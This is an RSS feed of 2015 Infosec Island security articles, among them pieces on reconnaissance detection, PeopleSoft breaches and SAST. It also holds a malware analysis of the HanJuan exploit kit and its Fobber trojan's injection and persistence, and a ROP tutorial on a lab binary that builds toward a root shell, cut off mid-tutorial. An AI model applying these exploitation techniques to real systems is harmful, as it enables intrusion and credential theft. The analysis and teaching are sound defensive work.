Infosec Island Latest Articles https://www.infosecisland.com Adrift in Threats? Come Ashore! en hourly 1 How to Tell a Landscaper From a Thief https://www.infosecisland.com/blogview/24626-How-to-Tell-a-Landscaper-From-a-Thief.html https://www.infosecisland.com/blogview/24626-How-to-Tell-a-Landscaper-From-a-Thief.html Mon, 20 Jul 2015 21:11:00 -0500 If I can see a person standing in front of a neighboring house inspecting the windows and the doors, should I call the police?

Maybe it is the air-condition technician looking for the best place to install a new air-condition unit, or maybe it is a robber doing reconnaissance and checking what is the easiest way to get into the house. It is hard to tell!

Now what if I can see a user sending requests to non-existing pages in my application? 

Maybe these are broken links created mistakenly by that user, or maybe these are attack reconnaissance, pre-attack activity done by a malicious user. It is also hard to tell! 

A key objective for any security team is to make sure that organizational assets -- whether these are servers, applications or data -- are protected. Therefore a preliminary attack reconnaissance activity that target non-existing assets may be casually dismissed due to lack of: interest, human resources or even proper security controls. More to that, attack reconnaissance activity may look like legitimate users traffic when inspected in the wrong context.

From a threat intelligence point of view these casually dismissed attack reconnaissance should be considered as valuable information and should be treated as such. In many cases this reconnaissance activity is the first or even the only opportunity to detect malicious activity just before it slips under the detection radar.

This article presents an example of how threat intelligence analysis utilizing cloud network and inspecting requests for non-existing Web application pages can help with predicting the up-coming brute force attacks. In other words, how to catch a robber just before he tampers with the door lock.   

The Good, The Bad and The Ugly

Brute force Web attackers attempt to gain privileged access to a Web application by sending a very large set of login attempts. In many cases brute force attacks will start with a preliminary reconnaissance process of finding the login pages in the targeted Web application.

While trying to find those login pages attackers will use a dictionary of possible login pages. Not all of these login pages exist on the targeted Web application; therefore accessing those non-existent pages will result with a Web application failure.

There are 3 questionable scenarios for failures: Good, Bad and Ugly. 

The Good

Q: What if we detect someone trying to accesses a non-existing page “login.aspx” on the Web application?

A: If it happened just once, this kind of activity should be ignored. It is possible that it is a mistake made by a legitimate user, trying to access the wrong page. There is not enough information for determining that this is a malicious attempt.

The Bad

Q: What if we detect many attempts to access different files on the same Web application (“login.aspx”, “log-in.asp”…), all results with failure?

A: It seems like this attacker is looking for the logging page of the Web application and he is just one step from launching a brute force attack. The attacker may use “slow & low” attack technique in order to evade security controls detection.   

The Ugly 

Q: What if we detect “bad” activity of many attempts to access different files, but this time across many different Web applications?

A: It seems like attacker is planning to launch a distributed targets attack against many applications. Executing reconnaissance on several Web applications at the same time in order to scale and increase attack surface.

Learning from the cross-targeted activity of the attack, leads us to one unavoidable conclusion – it is going to be Ugly!

Summary

If the attacker knows the location of the login page, looking at failures in the reconnaissance activity won’t work, but everybody make mistakes – even (especially) attackers. It is up to the security teams to be patient and attentive in detecting similar failures and mistakes leading to the detection of variety of web attacks.

The accuracy of combining those reconnaissance activates into reliable insights rely on the diversity of the analyzed data. In the example presented above, the reconnaissance across many different Web applications was the differentiator in the threat intelligence analysis. Therefore, it is only natural that cloud networks should utilize the rich, diverse and continuous data, streaming through their infrastructure into threat intelligence.   

And when a suspicious person is wandering across your neighborhood inspecting houses doors and windows, it is time to call the police! 

About the Author: Or Katz is a security researcher at Akamai Technologies.

Copyright 2010 Respective Author at Infosec Island]]>
Universities at risk of Data Breaches: Is it Possible to Protect Them? https://www.infosecisland.com/blogview/24625-Universities-at-risk-of-Data-Breaches-Is-it-Possible-to-Protect-Them.html https://www.infosecisland.com/blogview/24625-Universities-at-risk-of-Data-Breaches-Is-it-Possible-to-Protect-Them.html Fri, 17 Jul 2015 09:49:55 -0500 Harvard University recently announced that on June 19 an intrusion on Faculty of Arts and Sciences and Central Administration information technology networks was discovered. According to the announcement on Harvard website, this breach affected eight different schools and thought to have exposed students’ log-in credentials. University IT staff denied that any personal data or information from internal email system had been exposed.

An advisory on the website urges people affiliated with the affected institutions to change their passwords. Password change could be required again soon as a part of security measures to protect Harvard system.

It is not the first time Harvard has been hacked. Earlier this year AnonGhost group hacked website of Institute of Politics at Harvard and in 2012 Harvard was attacked by GhostShell team, which also took responsibility for hacking servers of 100 major universities such as Stanford, the University of Pennsylvania and the University of Michigan.

Higher education certainly is one of the most targeted and – meanwhile – common industries for cyber-attacks. Increased attention to the security of educational institutions derives from the fact that universities are less secure than enterprises while college ERP systems contain not less valuable data, and the amount of important information may be even bigger, that entails large number of potential victims of an attack. The detailed reasons why both cybercriminals and security specialists focus on this area are described below.

Why are universities systems a perfect target for cyber-attacks?

First and the main reason lies in the environment of campus systems. University networks have a large number of users. Thousands of freshmen go to university every year, it’s hard to imagine that any business institution hires so many new employees on the regular basis. College systems store personal information, payment information, and medical records of current and former students and employees. Great amount of sensitive information always comes with attempts to steal them. Moreover, the exposure of this information may have long-term consequences, as some of the students of the top universities are likely to held key positions in the nearest future. University systems supported BYOD (bring your own device) policy before this term appeared in the business sphere. Students are active in using latest technologies. File sharing, social media, and adult content is a source of malware and viruses. If a student’s device synced with college network is compromised, it’s not only the student who is affected, so does the university. More information on mobile application security and mobile Device management security you can find in our article.

Universities have to provide an easy access to their systems for all these students and personnel. It makes incidents investigation more difficult than when we deal with business structures.

Finally, such systems can store not only educational and personal information but governmental and even military research materials. So, university systems are an attractive target to state-sponsored hackers, as this data can be used for industrial or state espionage.

What had happened? Was Harvard breached via a vulnerability in PeopleSoft?

Harvard has not disclosed any technical details about the breach, thus, it is a fertile ground for speculations and baseless conclusions. The only thing we can say for sure is that PeopleSoft application is installed in multiple Harvard colleges (as it is known from public sources) and that real examples of universities’ hack via PeopleSoft vulnerabilities took place in last few years.

Several cases of data breaches related to vulnerabilities in Oracle PeopleSoft applications have been published in the media since 2007 when two students faced 20 years in prison after they hacked California state university’s PeopleSoft system. In August 2007, three students installed keylogging software on computers at Florida A & M University and used the passwords they gleaned to gain access to the school’s PeopleSoft system to modify grades. A student at the University of Nebraska in 2012 was able to break into a database associated with the university's PeopleSoft system, exposing Social Security numbers and other sensitive information on about 654,000 students, alumni and employees. In March 2013, Salem State University in Massachusetts alerted 25000 students and staff that their Social Security Numbers may have been compromised in a database breach.  And this is not the full list of university attacks, and it is only against PeopleSoft systems.

PeopleSoft systems are widely used in higher education, they are implemented in more than 2000 universities and colleges around the world. ERPScan’s research revealed that 236 servers related to universities are accessible on the internet (including Harvard server). It means, that at least 13% of universities with PeopleSoft systems are accessible from the Internet while Enterprises have about 3-7% depending on the Industry. 78 of these universities are vulnerable to TokenChpoken attack presented at HackInParis Conference by Alexey Tyurin. 7 of these universities are among America’s top 50 colleges by Forbes, so they seem a real treasure for cybercriminals.

TokenChpoken attack allows to find the correct key to Token, login under any account and get the full access to the system. In most cases, it takes not more than a day to decrypt token by using a special bruteforcing program on latest GPU that costs about $500. It’s almost impossible to identify the fact of this attack, as an attacker uses common legitimate system functionality, he brute-forces token password remotely by downloading a token from web page, and then all he needs is just to login to the system.

Other Universities (besides 78 mentioned before) are also potentially vulnerable, but only students with access to internal University PeopleSoft system can exploit this vulnerability and get administrative rights.

Moreover, 12 universities still have a default password for a token, so any unskilled attacker can successfully perform an attack.

What should we learn from the hacks?

First, we should admit that higher education institutions face risks that can actually result in espionage, blackmail, and fraud.

PeopleSoft is clearly the leader in higher education though there are other university ERP vendors like Three Rivers Systems, Ellucian, Jenzabar, Redox, and others.

As all university networks are complex and consist of numerous modules and there are numerous vulnerabilities in them, protecting them seems a nightmare for any IT team. Cybersecurity is not some separate steps taking from time to time, but the ongoing process. Of course, no one can prevent all threats and attacks, so safety lies in continuous monitoring and mitigation of risks.

The awareness of Oracle PeopleSoft security is even worse than with SAP Security where is also the lack of awareness, but it is decreasing. As for PeopleSoft, there are real examples of vulnerabilities and breaches, but nobody cares about it.

Related Reading: Many Organizations Using Oracle PeopleSoft Vulnerable to Attacks

Copyright 2010 Respective Author at Infosec Island]]>
Understanding the Strengths and Limitations of Static Analysis Security Testing (SAST) https://www.infosecisland.com/blogview/24620-Understanding-the-Strengths-and-Limitations-of-Static-Analysis-Security-Testing-SAST.html https://www.infosecisland.com/blogview/24620-Understanding-the-Strengths-and-Limitations-of-Static-Analysis-Security-Testing-SAST.html Fri, 17 Jul 2015 09:44:21 -0500 Many organizations invest in Static Analysis Security Testing (SAST) solutions like HP Fortify, IBM AppScan Source or Checkmarx or Coverity to improve application security. Properly used, SAST solutions can be extremely powerful: they can detect vulnerabilities in source code during the development process rather than after it, thereby greatly reducing the cost of fixing security issues versus dynamic analysis/run time testing. They can also discover kinds of vulnerabilities that dynamic analysis tools are simply incapable of finding. Because they are automated, SAST tools have the capability to scale across hundreds or thousands of applications in a way that is simply impossible with manual analysis alone.  

After investing in SAST, some organizations refrain from making further investments in application security. Stakeholders in these organizations are often under the belief that static analysis covers the vast majority of software security weaknesses, or that they cover the most important high risk items like the OWASP Top 10 and are therefore “good enough”. Instead of building security into software from the start, these organizations are content with getting a “clean report” from their scanning tools before deploying an application to production. This mindset is highly risky because it ignores the fundamental limitations of SAST technologies.  

The book, “Secure Programming with Static Analysis,” describes the fundamentals of static analysis in detail.  The books authors Brian Chess and Jacob West were two of the key technologists behind Fortify Software, which was later acquired by HP.  In the book, the authors state, ” half [of security mistakes] are built into the design” of the software, rather than the code. They go on to list classes of  software security issues, including: context-specific defects that are visible in code, and … . They go on to say, “no one claims that source code review is capable of identifying all problems”.  

Static analysis tools are complex. To function properly they need to have a semantic understanding of the code, its dependencies, configuration files, and many other moving pieces that may not be written in same programming language. They must do this while effectively juggling speed with accuracy and reducing the number of false positives to be usable. Their effectiveness is greatly challenged by dynamically-typed languages like JavaScript and Python where simply inspecting an object at compile time may not be able to reveal its class/type. This means that finding many software security weaknesses are either impractical or impossible.  

The NIST SAMATE project sought to measure the effectiveness of static analysis tools to help organizations improve their use of the technology. They performed both static analysis and manual source code review on open source software packages and compared results.  Their analysis showed that, between one-eight and one-thrid of all discovered weaknesses were “simple”. They further discovered that tools only found “simple” implementation bugs but did not find any vulnerability requiring a deep understanding of code or design. When run on the popular open source tool Tomcat, the tools produced warnings for 4 out of the 26 or 15.4% of the Common Vulnerability & Exposure entries. These statistics mirror the findings in Gartner in the paper “Application Security: Think Big, Start with What Matters” in which the authors suggest “anecdotally it is believed that SAST only covers up to 10% to 20% of the codebase DAST another 10% to 20%”. To put this in perspective, if an organization had built a tool like Tomcat themselves and run it through static analysis as their primary approach to application security, they would be deploying an application with 22 out of 26 vulnerabilities left in-tact and undetected.  

Dr. Gary McGraw classifies many of the kinds of security issues that static analysis cannot find as flaws rather than bugs. While the nature of flaws varies by application, some of the kinds of issues that static analysis is not reliably capable of finding includes:  

  • Storage and transmission of confidential data, particularly when that data is not programmatically discernible from non-confidential data
  • Issues related to authentication, such as susceptibility to brute force attacks, effectiveness of password reset, etc.
  • Issues related to entropy for randomization of non-standard data
  • Issues related to privilege escalation and insufficient authorization
  • Issues related to data privacy, such as data retention and other compliance (e.g. ensuring credit card numbers are masked when displayed)

Contrary to popular belief, many of the coverage gaps of static analysis tools carry significant organizational risk. This risk is compounded by the fact that organizations may not always have access to source code, the SAST tool may be incapable of understanding a particular language or framework, and the challenge of simply deploying the technology at scale and dealing with false positives.  

While static analysis is a very valuable technology for secure development, it is clearly no substitute for building applications with security in mind from the start. Organizations that embed security into the requirements and design and then validate with a combination of techniques including static analysis are best positioned to build robust secure software.  

Cross-posted from the SC Labs blog.  

Copyright 2010 Respective Author at Infosec Island]]>
Cloud Security: It’s in the Cloud - But Where? (Part III) https://www.infosecisland.com/blogview/24622-Cloud-Security-Its-in-the-Cloud-But-Where-Part-III.html https://www.infosecisland.com/blogview/24622-Cloud-Security-Its-in-the-Cloud-But-Where-Part-III.html Mon, 06 Jul 2015 09:59:00 -0500 In Part II, I discussed how organizations can enable cloud resilience and why it’s necessary to secure the cloud provider.

Today, let’s look at the need to institute a cloud assessment process and the four actions that organizations of all sizes can take to better prepare themselves as they place their sensitive data in the cloud.

While the cost and efficiency benefits of cloud computing services are clear, organizations cannot afford to delay getting to grips with their information security implications. In moving their sensitive data to the cloud, all organizations must know whether the information they are holding about an individual is Personally Identifiable Information (PII) and therefore has adequate protection.

There are many types of cloud-based services and options available to an organization. Each combination of cloud type and service offers a different range of benefits and risks to the organization. Privacy obligations do not change when using cloud services – and therefore the choice of cloud type and cloud service require detailed consideration before being used for PII.

Unfortunately, there is often a lack of awareness of information risk when moving PII to cloud-based systems. In particular, business users purchasing a cloud-based system often have little or no idea of the risks they are exposing the organization to and the potential impact of a privacy breach. In some cases, organizations are unaware that information has been moved to the cloud. Other times, the risks are simply being ignored. This is at a time when regulators, media and customers are paying more attention to the security of PII.

Here are four key issues:

  • Business users often have little or no knowledge of privacy regulation requirements because privacy regulation is a complex topic which is further complicated by the use of the cloud
  • Business users don’t necessarily question the PII the application will collect and use
  • Business users rarely consider cloud-based systems to be different from internal systems from a security perspective, and thus expect them to have the same level of protection built in
  • Application architects and developers often collect more PII than the applications need.

These issues often expose the organization to risks that could be completely avoided or significantly reduced.

The Cloud Assessment Process

Not to sound like a broken record, but putting private information into the cloud will certainly create some risk and must be understood and managed properly. Organizations may have little or no visibility over the movement of their information, as cloud services can be provided by multiple suppliers moving information between data centers scattered around the world. If the data being moved is subject to privacy regulations, and data centers are in different jurisdictions, this can trigger additional regulations or result in a potential compliance breach.

The decision to use cloud systems should be accompanied by an information risk assessment that’s been conducted specifically to deal with the complexities of both cloud systems and privacy regulations; it should also be supported by a procurement process that helps compel necessary safeguards. Otherwise, the tireless pressure to adopt cloud services will increase the risk that an organization will fail to comply with privacy legislation.

The ISF cloud assessment process has an objective to determine if a proposed cloud solution is suitable for business critical information. When assessing risk, here are a few questions that you should ask of your business:

1.       Is the information business critical?

2.       Where is it?

3.       What is the potential impact?

4.       How will it be used?

5.       How does it need to be protected?

6.       What sort of cloud will be used?

7.       How will the cloud provider look after it?

8.       How will regulatory requirements be satisfied?

Managing information risk is critical for all organizations to deliver their strategies, initiatives and goals. Consequently, information risk management is relevant only if it enables the organization to achieve these objectives, ensuring it is well positioned to succeed and is resilient to unexpected events. As a result, an organization’s risk management activities – whether coordinated as an enterprise-wide program or at functional levels – must include assessment of risks to information that could compromise success.

Better Preparation

Demand for cloud services continues to increase as the benefits of cloud services change the way organizations manage their data and use IT. Here are four actions that organizations of all sizes can take to better prepare:

  • Engage in cross business, multi-stakeholder discussions to identify cloud arrangements
  • Understand clearly which legal jurisdictions govern your organizations information
  • Adapt existing policies and procedures to engage with the business
  • Align the security function with the organizations approach to risk management for cloud services

With increased legislation around data privacy, the rising threat of cyber theft and the simple requirement to be able to access your data when you need it, organizations need to know precisely to what extent they rely on cloud storage and computing.

But remember: privacy obligations don’t change when information moves into the cloud. This means that most organizations’ efforts to manage privacy and information risk can be applied to cloud-based systems with only minor modifications, once the cloud complexity is understood. This can provide a low-cost starting point to manage cloud and privacy risk.

Copyright 2010 Respective Author at Infosec Island]]>
Challenges and Solutions of Threat and Vulnerability Sharing in 2015 https://www.infosecisland.com/blogview/24621-Challenges-and-Solutions-of-Threat-and-Vulnerability-Sharing-in-2015.html https://www.infosecisland.com/blogview/24621-Challenges-and-Solutions-of-Threat-and-Vulnerability-Sharing-in-2015.html Mon, 29 Jun 2015 11:40:00 -0500 The Evolution of Information Sharing for Banks

Overcoming the challenges that information sharing presents will require greater collaboration across the financial industry and a focus on combined efforts rather than individual protection

The concept of threat and vulnerability sharing is not new. The practice has been around for decades now, taking on various forms. But, the cyber-attacks on JPMorgan Chase and several other financial institutions this past year have caused a major push for improved bank security in 2015.

Information sharing programs should reach across sectors to increase accessibility and enhance the conversation between different companies about emerging cybersecurity threats and enhancements. When an embarrassing breach occurs, the last thing a bank wants to do is share the details and seem vulnerable to their competitors, but this will in the end help prevent further attacks across the entire financial sector.

Although more banks are starting to share cybersecurity threats with peer institutions, several challenges still remain as a roadblock to adopting as a best practice. Institutions need to take initiative and get involved with information sharing programs such as Soltra Edge,and FS-ISAC, a financial services information sharing organization sponsored by the federal government. Banks should continue to donate towards and involve themselves with these types of initiatives in order to be proactive about their data safety in the future.

Data collaboration has evolved over time from loose relationships to more formal methods of communications between humans and machine-assisted system updates. New efforts are changing operations, especially in the automation and reporting process, becoming more machine centric.  Much like the IPS movement a decade ago took the alerts from the IDS systems and acted on them, this will allow large organizations to recognize threats rapidly. Tools lend to quicker detection allowing banks to combine efforts and identify single actors that are affecting several different financial institutions. By shifting their security vision to be incorporative of the entire ecosystem, banks will see their competitors as peers and work collaboratively to eliminate cyber attacks as a whole.  As offensive tools are used, this type of coordination can help minimize their useful life span from hours and days, to seconds.

Many people have raised questions surrounding government regulation and whether or not officials are doing enough to protect banks in the coming year. Although Congress has had failed attempts at passing legislation that would encourage information sharing among banks in the past, financial institutions need to be less reliant on the Fed and more reliant on themselves for security. When government regulates or legislates technical solutions it can dampen innovation in establishing new ways to handle problems directly and even create unintended consequences.  At the same time, too many companies are keeping details of breaches to themselves, making these attacks effective for a longer span of time.  Fortunately more and more banks are seeing the value of information, and offering up threat and vulnerability experiences more willingly. Industry and government can foster this by supporting information release and helping set up trusted forums.

In 2015, we should see a surge in new cooperative efforts among concerned companies and government organizations in sharing details and acting to put an end to some of the more persistent problems in cybersecurity today. In many cases, the same malicious malware is being used to attack different institutions across all sectors, and sharing this information could help protect an extremely wide scope of companies. The vision for cybersecurity in 2015 for the financial sector should be collaborative and proactive. The financial industry should embrace and adopt information sharing practices in the future and take control over threat actors. This will lead to  less devastating breaches and cyber attacks. With continued support, similar collaborative efforts will utilize information sharing and help level the cyber playing field.

About the Author: Shawn Masters is Senior Technical Director, Novetta Solutions

Copyright 2010 Respective Author at Infosec Island]]>
Enterprises See 30 Percent Rise in Phone Fraud: Report https://www.infosecisland.com/blogview/24619-Enterprises-See-30-Percent-Rise-in-Phone-Fraud-Report.html https://www.infosecisland.com/blogview/24619-Enterprises-See-30-Percent-Rise-in-Phone-Fraud-Report.html Thu, 25 Jun 2015 12:57:17 -0500 Based on data from its “telephony honeypot,” anti-fraud company Pindrop Security has determined that the number of scam calls aimed at enterprises has increased by 30 percent since 2013.

According to the State of Phone Fraud 2014-2015 report published by Pindrop on Wednesday, financial institutions are the most attractive target for fraudsters.

The company says card issuers are the most impacted, with a fraud call rate of 1 in every 900 calls. Banks and brokerages report a fraud call rate of 1 in every 2,650, respectively 1 in every 3,000 calls.

“The higher rate of phone fraud for card issuers can be attributed to the fact that credit cards are one of the most common ways for the public to complete transactions, and thus card numbers are at greater risk for theft,” Pindrop noted in its report. “Compared to credit card numbers, banking or brokerage account numbers are less widely distributed. The less an account number is distributed across channels, the less likely it is to be at risk for fraud.”

Financial institutions risk exposing an average of $7-15 million to phone fraud every year, the report shows.

Retailers, including online retailers, are also targeted by scammers. The average fraud call rate in the case of retailers is 1 in 1,000 calls, but the rate increases for products that are easy to resell, Pindrop Security noted.

Consumers are an attractive target for phone scammers. In the United States, consumers receive 86.2 million scam calls every month, with 2.5 percent getting at least one robocall each week. Pindrop says 36 million of the scam calls made to US consumers can be traced to one of the 25 most common schemes, such as technical support and IRS scams.

Read the rest of this article on SecurityWeek.com.

Copyright 2010 Respective Author at Infosec Island]]>
Elusive HanJuan EK Drops New Tinba Version (updated) https://www.infosecisland.com/blogview/24618-Elusive-HanJuan-EK-Drops-New-Tinba-Version-updated.html https://www.infosecisland.com/blogview/24618-Elusive-HanJuan-EK-Drops-New-Tinba-Version-updated.html Thu, 25 Jun 2015 11:24:00 -0500 UpdateDutch security firm Fox-IT has identified the payload as a new version of Tinba, a well-known banking piece of malware.

In this post, we describe a malvertising attack spread via a URL shortener leading to HanJuan EK, a rather elusive exploit kit which in the past was used to deliver a Flash Player zero-day.

Often times cyber-criminals will use URL shorteners to disguise malicious links. However, in this particular case, it is embedded advertisement within the URL shortener service that leads to the malicious site.

It all begins with Adf.ly which uses interstitial advertising, a technique where adverts are displayed on the page for a few seconds before the user is taken to the actual content.

flow

Following a complex malvertising redirection chain, the HanJuan EK is loaded and fires Flash Player and Internet Explorer exploits before dropping a payload onto disk.

The payload we collected uses several layers of encryption within the binary itself but also in its communications with its Command and Control server.

The purpose of this Trojan is information stealing performed by hooking the browser to act as a man-in-the-middle and grab passwords and other sensitive data.

Technical details Malvertising chain

Fiddlerflow

The first four sessions load the interstitial ad via an encoded JavaScript blurb:

encoded

Google Chrome’s JavaScript console can help us quickly identify the redirection call without going through a painful decoding process:

js_console

Subsequent redirections:

x19

monetiz

speed

The next three sessions were somewhat different from the rest and an actual connection between them could not be established right away. A deeper look revealed that the intended URL was loaded via Cross Origin Resource Sharing (CORS).

Cross-origin resource sharing (CORS) is a mechanism that allows restricted resources (e.g. fonts, JavaScript, etc.) on a web page to be requested from another domain outside the domain from which the resource originated. Wikipedia

CORS

Content is retrieved from the adk2.com ad network via the Access-Control-Allow-Origin request.

This takes us to the actual malvertising brought by youradexchange.com:

gate

The inserted URL may look benign and it is indeed a genuine Joomla website but it has one caveat: It has been compromised and is used as the gate to the exploit kit.

gate2

Exploit kit

The exploit kit pushed here looked different than what we are used to seeing (Angler EK, Fiesta EK, Magnitude EK, etc.). After some analysis and comparisons, we believe it is the HanJuan EK.

We have talked about HanJuan EK only very few times before because little is known about it. What we once described as the Unknown exploit kit, was in fact HanJuan and it has been extremely stealthy and evasive ever since.

And yet, here we found HanJuan EK hosted on a compromised website and with an easy way to trigger it on demand.

diagram

The landing page is divided into two main parts:

  • Code to launch a Flash exploit
  • Code to launch an Internet Explorer exploit

The filename for the Flash exploit is randomly generated each time using close patterns to the original HanJuan we’ve observed before.

However a new GET request session containing the Flash version used is inserted right after the exploit is delivered.

Finally, the payload is delivered via another randomly generated URL and filename with a .dat extension. Contrary to previous versions of HanJuan where the payload was fileless, this one drops an actual binary to disk.

Fiddler traffic:

Fiddler

Landing page (raw):

landingraw

Flash exploit: (up to 17.0.0.134 -> CVE-2015-0359)

SWF_exploit

The exploit performs a memory stack pivoting attack using the VirtualAllocEx API.

Internet Explorer exploit (CVE-2014-1776):

IE

In this case we also have a memory stack pivoting exploit but in the undocumented NtProtectVirtualMemory API.

Malwarebytes Anti-Exploit users were already protected against both these exploits:

MBAE

Malware payload

The malware payload delivered has been identified by our research team as Trojan.Agent.Fobber. This name was derived from a folder called “Fobber” that’s used to store the malware along with its associated files.

fobber_dir

Unlike a normal Windows program, Fobber makes it a habit to “hop” between different programs. The flow of execution for Fobber looks something like that seen below:

fobber

From what we have observed in our research, the purpose of the Fobber malware appears to be stealing user credentials for various accounts. While we have not confirmed any ties between Fobber and other known malware as of yet, we suspect it may be related to other information-stealing Trojans, like Carberp or Tinba.

Fobber.exe

This is the original file dropped by the exploit kit in the user’s temporary directory. The file itself has a random name, but will be referred to as fobber.exe in this article.

Fobber.exe is mildly obfuscated program. The samples we have observed always attempt to open random registry keys and then the malware performs a long sequence of jumps in an effort to create something like a “rabbit hole” for analysts to follow, slowing down analysis.

fobber_reg_keys

At the end of the jumps, the program decodes additional shellcode and creates a suspended instance of verclsid.exe. Verclsid.exe is a legitimate Microsoft program that is part of Windows, used to verify a Class ID. The shellcode is in injected into verclsid.exe and fobber.exe resumes execution of verclsid.exe. Below is an API trace of this behavior.

verclsid_create

At this point fobber.exe terminates and the malware execution continues in verclsid.exe.

Verclsid.exe (Fobber shellcode)

The main purpose of the Fobber shellcode inside of this process is to retrieve the process ID (PID) of Windows Explorer (explorer.exe) and inject a thread into the process. Injecting code into Windows Explorer is a very common stealth technique that’s been used in malware for many years.

It is also worth nothing that, starting with the Fobber shellcode inside of the verclsid process, the malware begins using an interesting unpacking technique designed to slow analysis that is exhibited throughout the remainder of the Fobber malware’s operation.

Before a function can be executed, its code is first decrypted, as seen in the image below (notice the junk instructions following “decode_more”).

before_decoder

And then after the call, the instructions become clear.

after_decoder

Eventually, when the function wants to return, it calls a special procedure that uses a ROP gadget.

before_return_proc

In side the call seen above (“return_caller”), the return pointer is overwritten to point to the return pointer of the parent function (in this case, sub_41B21A). In addition, all the bytes of the function that was just executed have been re-encrypted, as seen below.

after_return_proc

Such techniques can make the Fobber malware more difficult to analyze than traditional malware that unpack the entire binary image. Similar functionality is also seen in many commercial protectors, like Themida.

In order to locate the PID of Explorer, the malware searches for a known window name of “Shell_TrayWnd” that’s used by the Explorer process.

shell_tray

The shellcode uses the undocumented function RtlAdjustPrivilege to grant vercslid.exe theSE_DEBUG_PRIVILEGE. This will allow verclsid.exe to inject code into Windows Explorer without any issues. Following this function, more shellcode is decrypted in memory and a remote thread is created inside Explorer.

inject_thread

Following successful injection, verclsid.exe terminates and the malware continues inside of Windows Explorer

Explorer.exe (Fobber shellcode)

At this point the Fobber malware begins its main operations, to include establishing persistence on the victim computer, contacting the C&C server, and many more actions.

Persistence
Fobber keeps a foothold on the victim computer by copying itself (fobber.exe) into an AppData folder called “Fobber” using the name nemre.exe. On a typical computer, this path might look like:

C:\Users\<username>\AppData\Roaming\nemre.exe

The binary is launched when a user logs in using a traditional “Run” key method in the registry.

Infosec Island]]> VERT Vuln School: Return-Oriented Programming (ROP) 101 https://www.infosecisland.com/blogview/24617-VERT-Vuln-School-Return-Oriented-Programming-ROP-101.html https://www.infosecisland.com/blogview/24617-VERT-Vuln-School-Return-Oriented-Programming-ROP-101.html Thu, 25 Jun 2015 11:21:07 -0500 In the beginning, there were stack buffer overflows everywhere. Overflowing data on the stack made for a quick and easy way to subvert a program to run code provided by an attacker. Initially, this meant simply overwriting the saved return address on the stack with the location of shellcode typically on the stack and perhaps prefaced by a NOP sled, depending on how accurately the attacker could predict addresses of data in the corrupted stack.

One of the initial responses to this was to mark stack memory as non-executable (NX), so that an attacker couldn’t simply point EIP to instructions dumped onto the stack. Naturally, as this is a cat-and-mouse game, attackers figured out that they could setup the stack to return into libraries, allowing useful attacker specified code to run without the need to introduce new instructions. Now, the combination of randomized memory (ASLR) and data execution prevention (DEP) make it increasingly difficult to exploit a stack overflow on a modern operating system.

The answer to this came in 2007 in one of my favorite technical papers titled, “The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86)” by Hovav Shacham. This groundbreaking paper (and subsequent Black Hat 2008 talk) lays out an expansion of return-to-libc exploitation with a new name, ‘Return Oriented Programming (ROP)’. The basic idea of ROP, like its predecessor ret-to-libc, is to chain together instructions in memory marked as executable using short instruction sequences ending in the x86 ret instruction.

Unlike returning to a library and using existing code as it was (in some ways) intended, ROP takes advantage of unintended code sequences occurring in a program. As described in the paper, the technique works particularly well on x86 architectures due to the lack of instruction alignment and the high-density of the instruction set. The x86 machine code is similar to a page of writing with no punctuation and therefore, can be read to mean any number of things depending on where you start reading.

For example, “To win friends and influence” could be re-read to make new English words like “Tow in friend sand influence”. Putting this into context of machine instructions, a binary may contain the following byte sequence within executable code: “806b891: 8b 15 58 c3 0c 08”. If the CPU starts reading at 0x806b891, the opcode 0x8b indicates data should be moved from EDX (0x15) to the address 0x80cc358. Starting reading at 0x806b893 the CPU would interpret “pop eax; ret”.

This is a fundamental building block for ROP, also known as a gadget. Research has shown that even simplistic programs with minimal functionality contain enough instructions added by the compiler to create a Turing complete gadget set.

The idea is that by searching for the ret opcode (0xC3) within x86 machine code, automated tools can disassemble backwards from that point to generate a list of useful ROP gadgets. For a gadget to be considered useful, it must allow the caller to manipulate registers and memory in a consistent and reliable manner. This means avoiding long sequences with undesirable pointer dereferences or register manipulations. Gadgets with more than four instructions will generally create headaches but can still be used in a pinch. Several tools are freely available for enumerating and classifying useful gadgets from a target binary (for example, http://www.ropshell.com/).

Earlier this month, Bas van den Berg, held a ROP primer workshop at the BSides London. Unfortunately, I was unable to attend his session, but luckily, I did get to chat a moment with Bas who was kind enough to give me the VM used in the workshop. It turned out that this proved to be an interesting way to pass a little extra time sitting in London’s airport while waiting on my rescheduled departure.

I’d now like to share this experience by walking through my quick and dirty approach to creating a ROP chain exploit for the provided vulnerable target.

The program itself (level0 on the VM) is quite simple. Although no source code was provided it was easy enough to find that user-supplied data from stdin was being directly copied onto a stack buffer without a bounds check. Some sample output is as follows:

Return-Oriented Programming (ROP) 101 (1)

Providing a longer input string causes an interesting segfault:

Return-Oriented Programming (ROP) 101 (2)

The “A” (0x41) values ended up overwriting the saved return address, causing a SEGFAULT when the CPU tried to fetch an instruction from the bogus address.

The next step in the process is just like with traditional stack overflow exploitation in that we need to identify the offset between the start of crafted input and the saved return address. This is most easily achieved using a pattern generator similar to:

Return-Oriented Programming (ROP) 101 (3)

We can confirm this as follows:

Return-Oriented Programming (ROP) 101 (4)

The segfault at deadbeef is enough to confirm that we have EIP control, so the next step is to determine how to setup a fake stack so that the program will execute shellcode. As expected (since this is a ROP exercise), the stack is not executable, so we will have to work with executable memory within the program itself.

I started this process by uploading the binary to ropshell.com for quick analysis. A complete analysis of the binary is available at http://ropshell.com/ropsearch?h=6785d72a7337d3ef7367bc9246f88d55. I picked the following gadgets to construct my ROP chain:

Return-Oriented Programming (ROP) 101 (5)

The end goal here is to setup the stack such that I can invoke the execve system call to get a root shell (the challenge binary is suid root). To do this, I will need to arrange some data structures in memory for the system call, load EAX with the execve syscall number (0xb), and then invoke a system call (int 0x80). Setting EAX and triggering the system call are trivial but creating the argument and environment data structures required for the system call requires a little more creativity.

Before getting into that however, I think it would be useful to demonstrate how a ROP gadget is consumed. As a simple example, we can set EAX with an arbitrary value 0x00031337 by crafting input such that the address of ‘pop eax; ret’ will be at EIP followed by the value we desire for EAX:

Return-Oriented Programming (ROP) 101 (6)

In the above figure, I have prepared a crafted input with a single stage ROP chain and set a breakpoint at the gadget. As you can see (with a little help from the GDB peda addon), control has reached the ‘pop eax’ and the value on the top of the stack is 0x31337 as desired. Stepping into the next instruction shows EAX is in fact loaded as expected:

Return-Oriented Programming (ROP) 101 (7)

In general, this is how ROP chaining works to create fake stack frames. Each gadget address is specified followed by any stack values needed for execution of the gadget and then, of course, the address of the next gadget in the chain.

